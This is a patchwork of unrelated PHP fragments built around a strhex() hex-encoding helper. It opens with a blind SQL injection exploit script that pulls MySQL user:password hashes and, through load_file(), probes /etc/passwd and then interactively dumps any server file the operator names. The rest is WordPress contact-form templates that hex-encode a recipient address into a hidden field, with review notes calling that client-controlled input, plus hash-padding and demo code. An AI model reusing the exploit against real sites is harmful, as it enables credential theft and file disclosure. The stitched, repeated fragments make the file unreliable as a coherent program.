$msg = "\n(+) MySQL user:pass -> "; $sqli = "'+and+ascii(substring((sElEcT+cOncAt("; $sqli .= "user,0x3a,password)+from+mysql.user+"; getlogindetails($p, $msg, $sqli); $loadsqli = "'+and+!isnull(loAd_fIle(0x2F6574632F706173737764))--+"; if (checksqli($loadsqli, $p)) { echo "\n(!) Access to load_file(), wanna play? (y/n): "; $resp = trim(read()); if (strcmp($resp, "y") === 0) { $loadfile = ""; while (strcmp($loadfile, "q") != 0) { echo "\n(+) Please enter the file (q to quit): "; $loadfile = trim(read()); if (strcmp($loadfile, "q") === 0) { break; } $loadsqli = "'+and+!isnull(loAd_fIle(0x" . strhex($loadfile) . "))--+"; if (checksqli($loadsqli, $p)) { $sqli = "'+and+ascii(substring(load_file(0x" . strhex($loadfile); $msg = "(!) Dumping the " . $loadfile . " file, hold onto your knickers!\n"; getlogindetails($p, $msg, $sqli); } else { echo "(-) File doesn't exist/no access."; } } } else { echo "(-) Ok Exiting..\n"; die; } } }
<p id="badserver" class="errormsg" style="display:none;">Your email failed. Try again later.</p> <form id="contact" action="<?php /* The form posts to sendmail.php under the URL printed by bloginfo('template_url'). */ bloginfo('template_url'); ?> /sendmail.php" method="post"> <label for="name">Your name: *</label> <input type="text" id="nameinput" name="name" value=""/> <label for="email">Your email: *</label> <input type="text" id="emailinput" name="email" value=""/> <label for="comment">Your message: *</label> <textarea cols="20" rows="7" id="commentinput" name="comment"></textarea><br /> <input type="submit" id="submitinput" name="submit" class="submit" value="SEND MESSAGE"/> <input type="hidden" id="receiver" name="receiver" value="<?php
/* NOTE(review): the recipient address is written into a hidden form field and
 * posted back by the browser, so by the time it reaches the server it is
 * client-controlled input, not a trusted setting.
 * strhex() is not defined in this fragment; if it is a plain hex encoding (as
 * the name suggests) it is trivially reversible and gives neither secrecy nor
 * integrity for the address.
 * sendmail.php is not shown here. If it delivers to the posted `receiver`
 * value, the handler should instead read the address server-side (the same
 * get_option() lookup used below) and ignore the posted field, and the form
 * would also benefit from a request-origin check such as a nonce.
 * TODO confirm against sendmail.php. */
echo strhex(get_option('boldy_contact_email')); ?> "/> </form> </div> <!-- end colleft --> <?php get_sidebar(); ?> <?php get_footer(); ?>
/**
 * Turn a string into an array of 32-character bit-string words.
 *
 * Steps, as visible in the code: hex-encode the input with strhex(), convert
 * that to a string of bits with hexbin(), left-pad it to 8 bits per input
 * byte, run it through pad() twice (once with defaults, once with the
 * arguments 1 and the original bit length), cut the result into 32-character
 * chunks, and reverse the order of the four 8-character groups inside each
 * chunk.
 *
 * strhex(), hexbin(), leftpad() and pad() are defined elsewhere in the file.
 * NOTE(review): this looks like message preparation for a block-based hash
 * (padding, length append, byte-order swap per word) -- confirm against pad().
 *
 * @param string $string Input to convert.
 * @return array List of bit-string chunks, in input order.
 */
function init($string)
{
    $bitLength = strlen($string) * 8;

    // ASCII -> hex digits -> bit string, left-padded to 8 bits per input byte.
    $bits = leftpad(hexbin(strhex($string)), $bitLength);

    // Two padding passes; the second one also receives the original bit length.
    $bits = pad($bits);
    $bits = pad($bits, 1, $bitLength);

    $words = array();
    foreach (str_split($bits, 32) as $word) {
        // Reverse the order of the 8-character groups within this chunk.
        $groups = str_split($word, 8);
        $words[] = implode('', array_reverse($groups));
    }

    return $words;
}
/**
 * Decode a hex string into the raw bytes it represents.
 *
 * Spaces and literal "\x" prefixes are removed first, so "64 65", "6465" and
 * '\x64\x65' all decode to the same bytes. What is left is handed to
 * pack('H*') without any check that it contains only hex digits.
 *
 * @param string $hexstr Hex text, optionally space-separated or "\x"-prefixed.
 * @return string Decoded bytes.
 */
function hexstr($hexstr)
{
    $digits = str_replace(array(' ', '\\x'), '', $hexstr);

    return pack('H*', $digits);
}

/**
 * Hex-encode a string, two lowercase hex digits per byte.
 *
 * This is a reversible encoding (hexstr() undoes it), not encryption: it does
 * not hide the value from anyone who can read the output and does not protect
 * it against modification.
 *
 * @param string $string Bytes to encode.
 * @return string Hex representation of $string.
 */
function strhex($string)
{
    return bin2hex($string);
}

// ---------------------------------------------------------------------------
// Demo / smoke test for the two helpers above.
// ---------------------------------------------------------------------------

$teststr = "64 65 74 61 69 6c 73";
// Alternative sample kept from the original:
// $teststr = "01 02 63 00 39 00 45 00 36 00 43 00 32 00 30 00 41 00 30 00 00 00";

// Show every notice and warning while experimenting.
// NOTE(review): display_errors=1 is a debugging setting; it prints error
// details into the page and should not be enabled on a public host.
error_reporting(E_ALL);
ini_set('display_errors', 1);

$ascii_inputs = array(
    "details",
    "abcde",
);
$hex_inputs = array(
    "64 65 74 61 69 6c 73",
    "64657461696c73",
    '\\x64\\x65\\x74\\x61\\x69\\x6c\\x73',
);

echo "<pre>";

// Encode each ASCII sample and print the hex digits back to back.
foreach ($ascii_inputs as $str) {
    $str2 = strhex($str);
    // printf("strhex('%s') = %s [%s]\n", $str, var_export($str2, true), implode(" ", str_split($str2, 2)));
    echo $str2;
}

// Decode each hex sample; the result is computed but not printed.
foreach ($hex_inputs as $str) {
    $str2 = hexstr($str);
    // printf("hexstr('%s') = %s\n", $str, var_export($str2, true));
}

echo "</pre><hr>\n";
// show_source(__FILE__);
// Feed strhex() a series of fixed sample strings and print each result as
// "strhex(<input>) = <result><BR>". strhex() is defined elsewhere in the file.
// The arguments are echoed one by one, so the label is written before the
// function under test is called.
foreach (array("1fv", "1qf", "1fq", "qff", "", "FFFF") as $in) {
    echo "strhex(", $in, ") = ", strhex($in), "<BR>";
}

// Double the last sample twice to try longer inputs (8, then 16 characters).
$in .= $in;
echo "strhex(", $in, ") = ", strhex($in), "<BR>";
$in .= $in;
echo "strhex(", $in, ") = ", strhex($in), "<BR>";
echo "<BR>";

/**********************************************************/
echo "*******************************<BR>";
echo "strbin(\$string) : <BR>";
echo "*******************************<BR>";
/**********************************************************/

// Same pattern for strbin(), which is also defined elsewhere.
foreach (array("10000000", "100000v0", "100000w0", "100001w0") as $in) {
    echo "strbin(", $in, ") = ", strbin($in), "<BR>";
}

// Next sample: the empty string.
$in = "";
<p id="badserver" class="errormsg" style="display:none;">Your email failed. Try again later.</p> <form id="contact" action="<?php /* The form posts to sendmail.php under the URL printed by bloginfo('template_url'). */ bloginfo('template_url'); ?> /sendmail.php" method="post"> <label for="nameinput">Your name: *</label> <input type="text" id="nameinput" name="name" value=""/> <label for="emailinput">Your email: *</label> <input type="text" id="emailinput" name="email" value=""/> <label for="commentinput">Your message: *</label> <textarea cols="20" rows="7" id="commentinput" name="comment"></textarea><br /> <input type="submit" id="submit" name="submit" class="submit" value="SEND MESSAGE"/> <input type="hidden" id="receiver" name="receiver" value="<?php
/* NOTE(review): the recipient address is written into a hidden form field and
 * posted back by the browser, so by the time it reaches the server it is
 * client-controlled input, not a trusted setting.
 * strhex() is not defined in this fragment; if it is a plain hex encoding (as
 * the name suggests) it is trivially reversible and gives neither secrecy nor
 * integrity for the address.
 * sendmail.php is not shown here. If it delivers to the posted `receiver`
 * value, the handler should instead read the address server-side (the same
 * get_option() lookup used below) and ignore the posted field, and the form
 * would also benefit from a request-origin check such as a nonce.
 * TODO confirm against sendmail.php. */
echo strhex(get_option('diary_contact_email')); ?> "/> </form> </section> <div class="sidebadge"></div> </article> </section> <!-- End Main Content ( left col ) --> <?php get_sidebar(); get_footer(); ?>
_e('Your email failed. Try again later.', 'hm'); ?> </p> <form id="contact" action="<?php echo get_template_directory_uri(); ?> /inc/sendmail.php" method="post"> <label>Your name: *</label> <input type="text" id="nameinput" name="name" value=""/> <label>Your email: *</label> <input type="text" id="emailinput" name="email" value=""/> <label>Your message: *</label> <textarea cols="20" rows="7" id="commentinput" name="comment"></textarea> <input type="submit" id="send_message" name="submit" class="submit" value="SEND MESSAGE"/> <input type="hidden" id="receiver" name="receiver" value="<?php echo strhex(of_get_option('contact_form_email')); ?> "/> </form> </div> </div> <!--END .post_detail--> <?php } ?> <?php } ?> <script type="text/javascript">